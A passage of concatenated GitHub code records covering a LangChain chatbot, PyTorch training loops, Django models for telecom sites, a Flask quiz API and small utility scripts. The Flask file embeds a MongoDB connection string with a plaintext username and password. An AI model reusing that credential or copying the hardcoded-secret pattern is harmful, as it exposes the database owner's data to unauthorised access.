instance = get_instance(app_id)\r\n path = pick_sql_version(instance)\r\n group_id, pswd = get_group_id(app_id)\r\n command = command_builder(path, group_id)\r\n start_ssms(command, pswd)\r\n\r\n\r\nmain()\r\n","repo_name":"ystanev/ssms_launcher","sub_path":"ssms.py","file_name":"ssms.py","file_ext":"py","file_size_in_byte":3661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26611622098","text":"import streamlit as st\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.chains import ConversationalRetrievalChain\nfrom langchain.prompts.prompt import PromptTemplate\nfrom langchain.callbacks import get_openai_callback\nfrom langchain.memory import 
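The queries in ssms.py above splice user input into SQL with % string formatting, which breaks on quotes and invites injection; sqlite3's ? placeholders are the safe equivalent and need no manual quoting:

```python
# Parameterized query instead of "... WHERE appid = '%s'" % app_id.
import sqlite3

conn = sqlite3.connect(":memory:")
c = conn.cursor()
c.execute("CREATE TABLE groups (id TEXT, name TEXT, appid TEXT)")
c.execute("INSERT INTO groups VALUES ('1', 'dba', 'app1')")

app_id = "app1"   # pretend this came from input()
c.execute("SELECT DISTINCT id, name FROM groups WHERE appid = ?", (app_id,))
print(c.fetchall())   # [('1', 'dba')]
```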
ConversationBufferMemory\nfrom modules.sidebar import Sidebar\nimport langchain\nlangchain.verbose = False\n\nclass Chatbot:\n\n def __init__(self, model_name, temperature, vectors):\n self.model_name = model_name\n self.temperature = temperature\n self.vectors = vectors\n \n\n def conversational_chatbot(self, query):\n \"\"\"\n Start a conversational chat with a model via Langchain\n \"\"\"\n llm = ChatOpenAI(model_name=self.model_name, temperature=self.temperature)\n #chain_type = 'refine' or map_rank #we can use this also\n #chain_type = 'stuff' which acts as default\n retriever = self.vectors.as_retriever()\n memory = ConversationBufferMemory(\n memory_key=\"chat_history\",\n return_messages=True #returns chat history as a list of messages as opposed to a single string\n)\n template = \"\"\"Given an uploaded file, take the query and answer it based on the uploaded file then take up\n a follow up query, rephrase the follow up query to be a standalone question, in its original language. Also\n say \"Thanks for asking this question\" after every query. If you don't know the answer say \"Sorry, I don't \n know the answer to this question.\", don't make up your own answer. Be polite and fluent in your answers\n Chat History:\n {chat_history}\n Follow Up Input: {query}\n Standalone question:\"\"\"\n CONDENSE_QUESTION_PROMPT = PromptTemplate.from_template(template)\n\n \n chain = ConversationalRetrievalChain.from_llm(llm=llm, memory=memory,condense_question_prompt=CONDENSE_QUESTION_PROMPT,\n retriever=retriever,verbose=True, return_source_documents=False)\n \n chain_input = {\"question\": query, \"chat_history\": st.session_state[\"history\"]}\n result = chain(chain_input)\n\n st.session_state[\"history\"].append((query, result[\"answer\"]))\n return result[\"answer\"]\n \n \n","repo_name":"Asikni/LLM_Based_Chatbot","sub_path":"src/modules/chatbot_main.py","file_name":"chatbot_main.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28806317930","text":"# import os\nimport pickle\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\n\nfrom util.config import *\nfrom rnn.mydatasets import VisitSequenceWithLabelDataset, visit_collate_fn\nfrom rnn.lstm import MyLSTM\nfrom util.plots import plot_learning_curves, save_fig\nfrom util.utils import train, evaluate\nfrom other_models.ac_util import plot_confusion_matrix, calc_scores\n\nlogger = logging.getLogger(__name__)\n\nNUM_EPOCHS = 100\nBATCH_SIZE = 8\nUSE_CUDA = False # Set 'True' if you want to use GPU\nNUM_WORKERS = 1\ncriterion = nn.CrossEntropyLoss()\n\ntrain_seqs = pickle.load(open(PATH_TRAIN_SEQS, 'rb'))\ntrain_labels = pickle.load(open(PATH_TRAIN_LABELS, 'rb'))\nvalid_seqs = pickle.load(open(PATH_VALID_SEQS, 'rb'))\nvalid_labels = pickle.load(open(PATH_VALID_LABELS, 'rb'))\ntest_seqs = pickle.load(open(PATH_TEST_SEQS, 'rb'))\ntest_labels = pickle.load(open(PATH_TEST_LABELS, 'rb'))\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() and USE_CUDA else \"cpu\")\n\ndef test_dataset():\n return VisitSequenceWithLabelDataset(test_seqs, test_labels, num_features)\n\ndef test_loader():\n return DataLoader(dataset=test_dataset(), batch_size=1, shuffle=False, collate_fn=visit_collate_fn,\n num_workers=NUM_WORKERS)\n\n\ndef predict_mortality(model, device, data_loader):\n model.eval()\n probas = []\n # reference: 
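chatbot_main.py above wires a ChatOpenAI model, a vector-store retriever, buffer memory, and a custom condense-question prompt into a ConversationalRetrievalChain. A hedged sketch of that wiring against the same-era langchain API; note the condense prompt is expected to expose {chat_history} and {question}, whereas the record's template names the second slot {query}. `vectors` is assumed to be an existing vector store:

```python
# Minimal chain wiring, mirroring the record's conversational_chatbot.
from langchain.chat_models import ChatOpenAI
from langchain.chains import ConversationalRetrievalChain
from langchain.memory import ConversationBufferMemory
from langchain.prompts.prompt import PromptTemplate

def build_chain(vectors, model_name="gpt-3.5-turbo", temperature=0.0):
    llm = ChatOpenAI(model_name=model_name, temperature=temperature)
    memory = ConversationBufferMemory(memory_key="chat_history",
                                      return_messages=True)
    condense = PromptTemplate.from_template(
        "Chat History:\n{chat_history}\n"
        "Follow Up Input: {question}\n"
        "Standalone question:")
    return ConversationalRetrievalChain.from_llm(
        llm=llm,
        retriever=vectors.as_retriever(),
        memory=memory,
        condense_question_prompt=condense)
```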
https://medium.com/@josh_2774/deep-learning-with-pytorch-9574e74d17ad\n with torch.no_grad():\n for idx, (inputs, labels) in enumerate(data_loader):\n out = model.forward(inputs)\n proba = torch.max(out).item()\n proba = min(proba, 1)\n proba = max(proba, 0)\n probas.append(proba)\n\n print(probas)\n return probas\n\ndef num_features():\n return len(train_seqs[0][0])\n\n\ndef train_variable_rnn():\n logger.info(\"Epochs: {}, batch size: {}, Cuda: {}, workers: {}\".format(NUM_EPOCHS, BATCH_SIZE,\n USE_CUDA, NUM_WORKERS))\n\n torch.manual_seed(1)\n if device.type == 'cuda':\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n # Data loading\n print('===> Loading entire datasets')\n\n assert (len(train_seqs) == len(train_labels))\n assert (len(valid_seqs) == len(valid_labels))\n assert (len(test_seqs) == len(test_labels))\n\n logger.info(\"num_features: {}\".format(num_features()))\n logger.info(\"train patients: {}\".format(len(train_seqs)))\n logger.info(\"val patients: {}\".format(len(valid_seqs)))\n\n train_dataset = VisitSequenceWithLabelDataset(train_seqs, train_labels, num_features())\n valid_dataset = VisitSequenceWithLabelDataset(valid_seqs, valid_labels, num_features())\n\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, shuffle=True, collate_fn=visit_collate_fn,\n num_workers=NUM_WORKERS)\n valid_loader = DataLoader(dataset=valid_dataset, batch_size=BATCH_SIZE, shuffle=False, collate_fn=visit_collate_fn,\n num_workers=NUM_WORKERS)\n # batch_size for the test set should be 1 to avoid sorting each mini-batch which breaks the connection with patient IDs\n\n model = MyLSTM(batch_size=BATCH_SIZE, input_size=num_features())\n\n optimizer = optim.Adam(model.parameters())\n\n model.to(device)\n criterion.to(device)\n\n best_val_acc = 0.0\n train_losses, train_accuracies = [], []\n valid_losses, valid_accuracies = [], []\n for epoch in range(NUM_EPOCHS):\n train_loss, train_accuracy = train(model, device, train_loader, criterion, optimizer, epoch)\n valid_loss, valid_accuracy, valid_results = evaluate(model, device, valid_loader, criterion)\n\n train_losses.append(train_loss)\n valid_losses.append(valid_loss)\n\n train_accuracies.append(train_accuracy)\n valid_accuracies.append(valid_accuracy)\n\n is_best = valid_accuracy > best_val_acc # let's keep the model that has the best accuracy, but you can also use another metric.\n if is_best:\n best_val_acc = valid_accuracy\n torch.save(model, MODEL_PATH)\n\n plot_learning_curves(train_losses, valid_losses, train_accuracies, valid_accuracies)\n\n\ndef score_model(path=MODEL_PATH):\n best_model = torch.load(path)\n test_loss, test_accuracy, test_results = evaluate(best_model, device, test_loader(), criterion)\n\n class_names = ['No Sepsis', 'Sepsis']\n # plot_confusion_matrix(test_results, class_names)\n\n Y = []\n y_pred = []\n\n for i,j in test_results:\n Y.append(i)\n y_pred.append(j)\n\n calc_scores(Y, y_pred, clf_name=\"LSTM\")\n fig = plot_confusion_matrix(Y, y_pred, clf_name=\"LSTM\")\n save_fig(fig, \"confusion\")\n\n\nif __name__ == \"__main__\":\n train_variable_rnn()\n score_model()\n","repo_name":"ach39/Big-Data","sub_path":"sepsis_prediction/src/rnn/train_variable_rnn.py","file_name":"train_variable_rnn.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36253964825","text":"import logging\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as 
F\nimport torch.optim as optim\nfrom tqdm import tqdm\n\nfrom models.local_loss_net import LocalLossNet\nfrom optimizers.sam import SAM\nfrom utils.data import to_one_hot\nfrom models.local_loss_blocks import LocalLossBlockLinear, LocalLossBlockConv\nfrom utils.logging import get_logger, get_csv_logger, retire_logger\nfrom utils.models import count_parameters\n\n\nclass Trainer:\n\n def __init__(self, cfg, model, train_set, valid_set, logger=None):\n self.cfg = cfg\n self.model = model\n self.logger = logger\n if logger is None:\n self.logger = get_logger(__name__, logging.INFO)\n self.csv_logger = None\n self.logger.info(model.__str__())\n self.logger.info(f'Model has {count_parameters(model)} parameters influenced by global loss')\n\n self.train_set = train_set\n self.valid_set = valid_set\n\n\n self.model.set_learning_rate(cfg.lr)\n self.select_optimizer()\n\n if cfg.gpus:\n self.model.cuda()\n\n self.train_loader = self.get_loader(train_set)\n self.valid_loader = self.get_loader(valid_set, shuffle=False)\n\n def get_loader(self, data_set, shuffle=True):\n kwargs = {'pin_memory': True} if self.cfg.gpus else {}\n return torch.utils.data.DataLoader(\n data_set,\n batch_size=self.cfg.batch_size,\n shuffle=shuffle,\n num_workers=self.cfg.data_loader_workers,\n worker_init_fn=lambda worker_id: np.random.seed(\n self.cfg.seed + worker_id),\n **kwargs)\n\n def select_optimizer(self):\n if self.cfg.sam.active:\n if self.cfg.optim == 'sgd':\n self.optimizer = SAM(self.model.parameters(), optim.SGD,\n rho=self.cfg.sam.rho, adaptive=self.cfg.sam.adaptive,\n lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n momentum=self.cfg.momentum)\n elif self.cfg.optim == 'adam' or self.cfg.optim == 'amsgrad':\n self.optimizer = SAM(self.model.parameters(), optim.Adam,\n rho=self.cfg.sam.rho, adaptive=self.cfg.sam.adaptive,\n lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n amsgrad=self.cfg.optim == 'amsgrad')\n if self.cfg.lr_scheduler:\n self.scheduler = torch.optim.lr_scheduler.StepLR(self.optimizer.base_optimizer, step_size=1,\n gamma=self.cfg.lr_gamma)\n elif self.cfg.optim == 'sgd':\n self.optimizer = optim.SGD(self.model.parameters(), lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n momentum=self.cfg.momentum)\n elif self.cfg.optim == 'adam' or self.cfg.optim == 'amsgrad':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.cfg.lr, weight_decay=self.cfg.weight_decay,\n amsgrad=self.cfg.optim == 'amsgrad')\n else:\n raise ValueError(f'Unknown optimizer {self.cfg.optim}')\n\n def trainiter(self):\n\n ''' Train model on train set'''\n self.model.train()\n correct = 0\n loss_total_local = 0\n loss_total_global = 0\n\n # Add progress bar\n if self.cfg.progress_bar:\n pbar = tqdm(total=len(self.train_loader))\n\n # Clear layerwise statistics\n if not self.cfg.no_print_stats:\n for m in self.model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n m.clear_stats()\n\n # Loop train set\n for batch_idx, (data, target) in enumerate(self.train_loader):\n if self.cfg.gpus:\n data, target = data.cuda(), target.cuda()\n target_ = target\n target_onehot = to_one_hot(target, self.cfg.num_classes)\n if self.cfg.gpus:\n target_onehot = target_onehot.cuda()\n\n # Clear accumulated gradient\n self.optimizer.zero_grad()\n self.model.optim_zero_grad()\n\n output, loss = self.model(data, target, target_onehot)\n loss_total_local += loss * data.size(0)\n loss = F.cross_entropy(output, target)\n if self.cfg.loss_sup == 'predsim' and not self.cfg.backprop:\n loss *= 
(1 - self.cfg.beta)\n loss_total_global += loss.item() * data.size(0)\n\n # Backward pass and optimizer step\n # For local loss functions, this will only affect output layer\n loss.backward()\n if self.cfg.sam.active:\n self.optimizer.first_step(zero_grad=True)\n self.model.local_loss_eval()\n F.cross_entropy(self.model(data), target).backward()\n self.optimizer.second_step()\n self.model.local_loss_train()\n else:\n self.optimizer.step()\n\n # If special option for no detaching is set, update weights also in hidden layers\n if self.cfg.no_detach:\n self.model.optim_step()\n\n pred = output.max(1)[1] # get the index of the max log-probability\n #print(pred, target)\n correct += pred.eq(target_).cpu().sum()\n\n # Update progress bar\n if self.cfg.progress_bar:\n pbar.set_postfix(loss=loss.item(), refresh=False)\n pbar.update()\n\n #break\n\n if self.cfg.progress_bar:\n pbar.close()\n\n loss_average_local = loss_total_local / len(self.train_loader.dataset)\n loss_average_global = loss_total_global / len(self.train_loader.dataset)\n error_percent = 100 - 100.0 * float(correct) / len(self.train_loader.dataset)\n \"\"\"string_print = 'Train epoch={}, lr={:.2e}, loss_local={:.4f}, loss_global={:.4f}, error={:.3f}%, mem={:.0f}MiB, max_mem={:.0f}MiB\\n'.format(\n epoch,\n lr, \n loss_average_local,\n loss_average_global,\n error_percent,\n torch.cuda.memory_allocated()/1e6,\n torch.cuda.max_memory_allocated()/1e6)\n if not args.no_print_stats:\n for m in model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n string_print += m.print_stats() \n print(string_print)\"\"\"\n\n return loss_average_local, loss_average_global, 100-error_percent\n\n def validate(self):\n ''' Run model on validation set '''\n self.model.eval()\n loss_total_local = 0\n valid_loss = 0\n correct = 0\n\n # Clear layerwise statistics\n if not self.cfg.no_print_stats:\n for m in self.model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n m.clear_stats()\n\n # Loop valid set\n for data, target in self.valid_loader:\n if self.cfg.gpus:\n data, target = data.cuda(), target.cuda()\n target_ = target\n target_onehot = to_one_hot(target, self.cfg.num_classes)\n if self.cfg.gpus:\n target_onehot = target_onehot.cuda()\n\n with torch.no_grad():\n output, loss = self.model(data, target, target_onehot)\n loss_total_local += loss * data.size(0)\n valid_loss += F.cross_entropy(output, target).item() * data.size(0)\n pred = output.max(1)[1] # get the index of the max log-probability\n correct += pred.eq(target_).cpu().sum()\n\n #break\n\n loss_average_local = loss_total_local / len(self.train_loader.dataset)\n loss_average = valid_loss / len(self.valid_loader.dataset)\n if self.cfg.loss_sup == 'predsim' and not self.cfg.backprop:\n loss_average *= (1 - self.cfg.beta)\n error_percent = 100 - 100.0 * float(correct) / len(self.valid_loader.dataset)\n \"\"\"string_print = 'Validate loss_global={:.4f}, error={:.3f}%\\n'.format(loss_average, error_percent)\n if not self.cfg.no_print_stats:\n for m in self.model.modules():\n if isinstance(m, LocalLossBlockLinear) or isinstance(m, LocalLossBlockConv):\n string_print += m.print_stats()\n print(string_print)\"\"\"\n\n return loss_average_local, loss_average, 100-error_percent\n\n def fit(self):\n ''' The main training and testing loop '''\n torch.autograd.set_detect_anomaly(True)\n # start_epoch = 1 if checkpoint is None else 1 + checkpoint['epoch']\n self.csv_logger = 
get_csv_logger(file_path='training_results.csv')\n # TODO: add checkpoint loading\n for epoch in range(self.cfg.epochs):\n # Train and test\n train_loss_local, train_loss_global, train_acc = self.trainiter()\n self.log_results(epoch, train_loss_local, train_loss_global, train_acc, msg='Train Run')\n valid_loss_local, valid_loss_global, valid_acc = self.validate()\n self.log_results(epoch, valid_loss_local, valid_loss_global, valid_acc, msg='Validation Run')\n self.csv_logger.info(f'{epoch},'\n f'{train_loss_local},{train_loss_global},{train_acc/100},'\n f'{valid_loss_local},{valid_loss_global},{valid_acc/100}')\n if self.cfg.exponential_lr_scheduler:\n self.scheduler.step()\n if isinstance(self.model, LocalLossNet):\n self.model.lr_scheduler_step()\n self.save_checkpoint(epoch, self.model, self.optimizer)\n\n retire_logger(self.csv_logger)\n\n def save_checkpoint(self, epoch, model, optimizer):\n # Check if to save checkpoint\n if self.cfg.checkpointing:\n os.makedirs(self.cfg.checkpoint_dir, exist_ok=True)\n torch.save({\n 'model_state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict()\n\n }, os.path.join(self.cfg.checkpoint_dir, f'{epoch}.pt'))\n\n def log_results(self, epoch, local_loss, global_loss, accuracy, msg=\"\"):\n self.logger.info(f'{msg}\\n\\t\\t'\n f'epoch: {epoch}\\n\\t\\t'\n f'local loss: {local_loss:.4f}\\n\\t\\t'\n f'global loss: {global_loss:.4f}\\n\\t\\t'\n f'accuracy: {accuracy:.3f}%\\n\\t\\t'\n f'mem: {torch.cuda.memory_allocated() / 1e6:.0f} MiB\\n\\t\\t'\n f'max mem: {torch.cuda.max_memory_allocated() / 1e6:.0f} MiB')\n","repo_name":"bonfab/local-error-signals","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"72965287800","text":"from django.utils import timezone\nimport datetime\n\nfrom smart_selects.db_fields import ChainedForeignKey,GroupedForeignKey\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n\nCONFIGURATION =( \n ('GHS','GHS'),\n ('GHX','GHX'),\n ('GXX','GXX'),\n ('OHS','OHS'),\n ('OHX','OHX'),\n ('OXX','OXX')\n)\n\nDG_OWNERSHIP = (\n ( \"HTT-DG\",\"HTT-DG\"),\n (\"LL-DG\",\"LL-DG\"),\n (\"NON-DG\",\"NON-DG\")\n)\n\nZONE = (\n (\"Coastal\",\"Coastal\"),\n (\"Northern\",\"Northern\"),\n (\"Southern\",\"Southern\")\n)\n\nREGION = (\n (\"Dar es salaam\",\"Dar es salaam\"),\n (\"Tanga\",\"Tanga\"),\n (\"Pwani\",\"Pwani\"),\n (\"Lindi\",\"Lindi\"),\n (\"Mtwara\",\"Mtwara\"),\n (\"Ruvuma\",\"Ruvuma\"),\n (\"Morogoro\",\"Morogoro\")\n)\n\nGRID_STATUS = (\n (\"Off Grid\",\"Off Grid\"),\n (\"Grid\",\"Grid\")\n)\n\nSITE_CLASS = (\n (\"Platinum\",\"Platinum\"),\n (\"Gold\",\"Gold\"),\n (\"Silver\",\"Silver\")\n)\n\nLUKU_PAYMENT =( \n (\"Post-Paid\", \"Post-Paid\"),\n (\"Pre-Paid\",\"Pre-Paid\"),\n (\"Off-Grid\",\"Off-Grid\"),\n (\"LandLord\",\"LandLord\"),\n (\"Consolidated\",\"Consolidated\")\n)\n\nSITE_STATUS =(\n (\"On Air\",\"On Air\"),\n (\"Decomisioned\",\"Decomisioned\")\n)\n\nVISIT_TYPE =(\n (\"QSV\",\"QSV\"),\n (\"1SVM\",\"1SVM\")\n)\n\nSITE_TYPE = (\n (\"IBS\",\"IBS\"),\n (\"Roof Top\",\"Roof Top\"),\n (\"Green Field\",\"Green Field\")\n)\n\nCRITICALITY =( \n (\"C1\",\"C1\"),\n (\"C2\",\"C2\")\n)\n\n#this will be used in any dropdown where selection is yes or no\nYES_NO_SELECTION = (\n (\"YES\",\"YES\"),\n (\"NO\",\"NO\"),\n)\n\n#Issues hindering access restriction to the sites\nACCESS_RESTRICTION = (\n (\"Safety Reasons\",\"Safety Reasons\"),\n (\"Permit 
Reasons\", \"Permit Reasons\"),\n (\"No Restriction\", \"No Restriction\"),\n)\n\nVEHICLE_STATUS = (\n (\"In Service\",\"In Service\"),\n (\"Out of Service\",\"Out of Service\"),\n)\n\nSPA_SELECTION = (\n ('Configured', 'Configured'),\n ('Non-Configured', 'Non-Configgured'),\n ('Optimized', 'Optimized'),\n)\n\nSITE_SHELTER = (\n ('Indoor', 'Indoor'),\n ('Outdoor', 'Outdoor'),\n)\n\nHTT_CLASS = (\n ('B','B'),\n ('C','C'),\n)\n\nCAR_OWNERSHIP = (\n ('Leased', 'Leased'),\n ('Owned', 'Owned'),\n)\n\nPOWER_TYPE = (\n ('AC','AC'),\n ('DC','DC')\n)\n\nclass FleetVehicle(models.Model):\n driver_name = models.CharField(max_length=50, blank=False, unique=True, null=True)\n registration_number = models.CharField(max_length=10, blank=False, unique=True, null=True)\n phone_number = models.IntegerField(blank=False, unique=True, null=True)\n vehicle_status = models.CharField(choices=VEHICLE_STATUS, max_length=50, blank=True, null=True, default=\"In Service\")\n car_ownership = models.CharField(choices=CAR_OWNERSHIP, max_length=50, blank=True, default='Owned')\n\n class Meta:\n verbose_name = 'Fleet Vehicle'\n verbose_name_plural = 'Fleet Vehicles'\n\n def __str__(self):\n return self.registration_number\n\n\nclass FuelStation(models.Model):\n station_name = models.CharField(max_length=50 ,blank=False, unique=True, null=True)\n class Meta:\n verbose_name = 'Fuel Station'\n verbose_name_plural = 'Fuel Stations'\n \n def __str__(self):\n return self.station_name\n\n\nclass Cluster(models.Model):\n cluster_name = models.CharField(max_length=50,unique=True,blank=False, null=True)\n noc_operator = models.CharField(max_length=100, blank=False)\n field_supervisor = models.CharField(max_length=100, blank=False)\n zonal_manager = models.CharField(max_length=100, blank=False)\n zone = models.CharField(choices=ZONE, max_length=20, blank=False)\n maintanance_partner = models.CharField(max_length=15, blank=False, default='PIVOTECH')\n\n def __str__(self):\n return self.cluster_name\n\n\nclass FieldEngineer(models.Model):\n cluster = models.ForeignKey('Cluster', null=True, blank=True, on_delete=models.SET_NULL)\n field_engineer = models.CharField(max_length=30, unique=True)\n joining_date = models.DateField(blank=True, null=True)\n phone_number = models.IntegerField(unique=True, null=True, blank=True)\n alternate_number = models.IntegerField(unique=True, null=True, blank=True)\n GMT = models.CharField(max_length=20, null=True, blank=True)\n vehicle = models.OneToOneField(FleetVehicle, on_delete=models.SET_NULL, null=True, primary_key=False)\n\n def __str__(self):\n return self.field_engineer\n class Meta:\n verbose_name = 'Field Engineer'\n verbose_name_plural = 'Field Engineers'\n\n @property\n def age_of_service(self):\n age_of_service = (datetime.datetime.now().date() - self.joining_date).days\n return age_of_service\n \n\nclass Site(models.Model):\n HTA_ID = models.CharField(primary_key=True, max_length=10, unique=True, blank=False)\n tenant_ID = models.CharField(max_length=10, blank=False)\n site_name = models.CharField(max_length=100, blank=False, null=True)\n anchor_tenant = models.CharField(max_length=30, blank=False, null=True)\n number_of_tenants = models.IntegerField(null=True, blank=True)\n fuel_station = models.ForeignKey('FuelStation', related_name='FuelStation', null=True, on_delete=models.SET_NULL)\n cluster = models.ForeignKey('Cluster', related_name='Cluster', null=True, on_delete=models.SET_NULL)\n region = models.CharField(choices=REGION, max_length=50, null=True) \n field_engineer = 
class Site(models.Model):\n    HTA_ID = models.CharField(primary_key=True, max_length=10, unique=True, blank=False)\n    tenant_ID = models.CharField(max_length=10, blank=False)\n    site_name = models.CharField(max_length=100, blank=False, null=True)\n    anchor_tenant = models.CharField(max_length=30, blank=False, null=True)\n    number_of_tenants = models.IntegerField(null=True, blank=True)\n    fuel_station = models.ForeignKey('FuelStation', related_name='FuelStation', null=True, on_delete=models.SET_NULL)\n    cluster = models.ForeignKey('Cluster', related_name='Cluster', null=True, on_delete=models.SET_NULL)\n    region = models.CharField(choices=REGION, max_length=50, null=True) \n    field_engineer = ChainedForeignKey(\n        FieldEngineer, \n        chained_field='cluster',\n        chained_model_field='cluster',\n        show_all=False,\n        auto_choose=False,\n        sort=True)\n    grid_status = models.CharField(choices=GRID_STATUS, default='Grid', null=True, max_length=50)\n    configuration = models.CharField(choices=CONFIGURATION, default='GXX', null=True, max_length=50)\n    dg_ownership = models.CharField(choices=DG_OWNERSHIP, default='HTT-DG', null=True, max_length=50)\n    site_class = models.CharField(choices=SITE_CLASS, default='Silver', null=True, max_length=50)\n    luku_payment = models.CharField(choices=LUKU_PAYMENT, default='Pre-Paid', null=True, max_length=50)\n    site_status = models.CharField(choices=SITE_STATUS, default='On Air', null=True, max_length=50)\n    htt_class = models.CharField(choices=HTT_CLASS, default='C',null=True, max_length=10)\n    QSV = models.CharField(choices=YES_NO_SELECTION, null=True, max_length=50, default='NO')\n    site_type = models.CharField(choices=SITE_TYPE, default='Green Field', null=True, max_length=250)\n    criticality = models.CharField(choices=CRITICALITY, default='C1', null=True, max_length=50)\n    dg_present = models.CharField(choices=YES_NO_SELECTION, default='YES', null=True, max_length=50)\n    DG_type = models.CharField(max_length=250, null=True)\n    tanesco_region = models.CharField(max_length=250, null=True, blank=True)\n    meter_number = models.IntegerField(null=True, blank=True)\n    luku_cph = models.DecimalField(max_digits=10, decimal_places=1)\n    fuel_cph = models.DecimalField(max_digits=10, decimal_places=1)\n    SPA_Status = models.CharField(choices=SPA_SELECTION, max_length=50, default='Optimized', null=True, blank=True)\n    site_load = models.CharField(max_length=10, null=True, blank=True)\n    power_type = models.CharField(choices=POWER_TYPE, max_length=50, default='DC', null=True, blank=True)\n    MKII_PLC = models.CharField(choices=YES_NO_SELECTION, default='YES', max_length=50)\n    PLC_locked = models.CharField(choices=YES_NO_SELECTION, default='YES', max_length=50)\n    dg_capacity = models.IntegerField()\n    tank_capacity = models.IntegerField(null=True)\n    site_shelter = models.CharField(choices=SITE_SHELTER, default='Outdoor',max_length=50, null=True, blank=True)\n    ETA = models.TimeField()\n    ERT = models.TimeField()\n    access_restricted = models.CharField(choices=YES_NO_SELECTION, default='NO',max_length=50, null=True, blank=True)\n    restriction_reasons = models.CharField(choices=ACCESS_RESTRICTION, default=\"No Restriction\",max_length=250, null=True, blank=True)\n    latitude = models.FloatField(blank=True, null=True)\n    longitude = models.FloatField(blank=True, null=True)\n    \n    def __str__(self):\n        return '{} {}'.format(self.site_name,self.tenant_ID)\n\n\nclass RelayData(models.Model):\n    StartDate = models.DateField()\n    zone = models.CharField(choices=ZONE, default='Coastal',max_length=50)\n    LegacySiteID = models.CharField(max_length=50)\n    SiteName = models.CharField(max_length=50)\n    GeneratorRunDHM = models.CharField(max_length=50)\n    GeneratorRunMinutes = models.CharField(max_length=50)\n    CummulativeRunningDHM = models.CharField(max_length=50)\n    CummulativeRunningMinutes = models.CharField(max_length=50)\n    GeneratorStopMinutes = models.CharField(max_length=50)\n    GeneratorStopDHM = models.CharField(max_length=50)\n    CummulativeStopMinutes = models.CharField(max_length=50)\n    CummulativeStopDHM = models.CharField(max_length=50)\n    datasourcename = models.CharField(max_length=50)\n    HTT_TrialSite = models.CharField(max_length=50)\n\n    class Meta:\n        verbose_name = 'Relay Data'\n        verbose_name_plural = 'Relay 
Data'\n\n    def __str__(self):\n        return self.SiteName\n    ","repo_name":"JAXPARROW/PivoTech-v2","sub_path":"siteinfo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":9032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1274116670","text":"if __name__ == \"__main__\":\n    r,c = map(int,input().split())\n    count = 0\n    r1 = []\n    c1 = []\n\n    for j in range(r):\n        s = input()\n\n        for i in range(c):\n            if s[i] == 'S':\n                c1.append(i)\n                r1.append(j)\n                count += 1\n    \n    if(count == r*c):\n        print(0)\n    else:\n        print(r*c - len(set(r1))*len(set(c1)))","repo_name":"rupeshmohanty/Competitive-programming-problems","sub_path":"Python/Codeforces/cakeminator.py","file_name":"cakeminator.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27160193951","text":"# Author: Yuganthi Krishnamurthy\n# Banner number : B00839935 \nfrom flask import Flask, request, Blueprint\nimport pymongo\nfrom flask_restx import Resource,Api\n\nquiz_blueprint = Blueprint('fetchQuestions',__name__)\napi = Api(quiz_blueprint)\n\nclient=pymongo.MongoClient(\"mongodb+srv://shwethasubash:webgroup19@webtutorial.uaxed.mongodb.net/QuizzRoom?retryWrites=true&w=majority\")\ndb=client.QuizzRoom\nuserCollection=db.Question_temp\n\nclass QuestionDetails(Resource):\n    def get(self):\n        results=userCollection.aggregate([{'$match':{'questionId':{'$gte':1}}}])\n        questionSet=[]\n        for result in results:\n            question = {}\n            question['questionId']=result['questionId']\n            question['question']=result['question']\n            question['options']=result['options']\n            question['selectedOption']=False\n            question['type']=result['type']\n            questionSet.append(question)\n        return {\"QuestionSet\":questionSet}\n\n\napi.add_resource(QuestionDetails,'/fetchQuestions')\n","repo_name":"Darpan313/Group19_QuizRoom","sub_path":"api/quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"23926230067","text":"import os\nimport cv2\nfrom Common.pnid_xml import text_xml_reader, symbol_xml_reader\nfrom Visualize.image_drawing import draw_bbox_from_bbox_list\n\n# Hyundai Engineering drawing images are all stored with a trailing -001-001 in the filename, so rename them to remove it\n\nxml_dir = \"D:/Test_Models/PNID/HyundaiEng/210518_Data/Symbol_XML\"\ndrawing_img_dir = \"D:/Test_Models/PNID/HyundaiEng/210518_Data/Drawing/JPG_tmp\"\noutput_img_dir = \"D:/Test_Models/PNID/HyundaiEng/210518_Data/Symbol_XML_Visualize\"\nis_text_xml = False\n\ndrawing_filenames = os.listdir(drawing_img_dir)\n\nfor drawing_filename in drawing_filenames:\n    print(drawing_filename)\n    name_only = drawing_filename.split(\".\")[0]\n    splitted_name = name_only.split(\"-\")\n    corrected_name = \"\"\n    for i in range(len(splitted_name)-2): # the two trailing 001 parts must be dropped\n        corrected_name += splitted_name[i]\n        corrected_name += 